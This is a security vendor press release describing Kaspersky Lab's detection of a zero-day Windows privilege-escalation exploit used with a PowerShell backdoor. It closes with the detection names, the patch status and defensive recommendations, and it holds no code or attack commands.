Kaspersky Lab’s automated technologies detected a previously unknown vulnerability in the Microsoft Windows operating system. It was used by an unidentified criminal group in an attempt to get complete control over a target device. The attack targeted the system center – the kernel – through a backdoor built from an essential element of the Windows operating system.
Backdoor is an extremely malicious type of malware because it allows attackers to discreetly control infected devices in their interest. Such escalation of privileges from a third party is usually hard to hide from security solutions. However, a backdoor that takes advantage of a previously unknown bug in the system – a zero-day vulnerability – has far greater chances to go unnoticed. Common security solutions can not recognize system infection, nor can they protect users from recognized threats so far.
Kaspersky Lab’s Exploit Prevention technology, however, has managed to detect the attempt to exploit the unknown vulnerability in Microsoft Windows. The attack scenario was the following: once the .exe malware file was released, malware was started. The infection used a zero-day vulnerability and gained privileges for successful persistence on the victim’s device. Malware then launches a backdoor developed with a legitimate Windows feature present on all devices running this operating system – a scripting structure called Windows PowerShell. This allowed the attackers to go unnoticed and avoid detection, saving them time to write the code for dangerous instruments. The malware then downloaded another backdoor from a legitimate text storage service that in turn gave offenders total control over the infected system.
“In this attack, we noticed two main trends that we often see in persistent advanced threats (APT),” explains Anton Ivanov, security expert at Kaspersky Lab. “First of all, use the exploits of escalating local privileges to stay on the victim’s device. Secondly, use legitimate structures like Windows PowerShell for malicious activities on the victim’s device. This combination gives attackers the ability to bypass standard security solutions. To detect such techniques, the security solution must use exploit prevention technologies and behavior-based engines.”
Kaspersky Lab products detected the exploit as:
- HEUR: Exploit.Win32.Generic
- HEUR: Trojan.Win32.Generic
- PDM: Exploit.Win32.Generic
Vulnerability was reported to Microsoft and received a patch on April 10th.
To prevent backdoor installation from zero-day Windows vulnerabilities, Kaspersky Lab recommends the following security measures:
- Once the vulnerability is resolved and the patch is downloaded, attackers cannot use it anymore. Install the Microsoft patch for the new vulnerability as soon as possible.
- If you are concerned about the security of the entire organization, make sure that all programs are updated as soon as a new patch of security is released. Use security products with vulnerability assessment and patch management capabilities to ensure that these processes run automatically.
- Use a proven, proven security solution that has behavior-based detection capabilities to protect against even unknown threats.
- Make sure the security team has access to the latest information on cyber threats. Private reports on the latest threats developments are available to Kaspersky Intelligence Reporting customers.
- Last but not least, make sure that staff are trained on the basics of IT security.
For details on the new exploit, you can see the full report on the SecureList. To further examine the technologies that have detected this and other zero-day vulnerabilities in Microsoft Windows, a Kaspersky Lab webinar is available for on-demand viewing.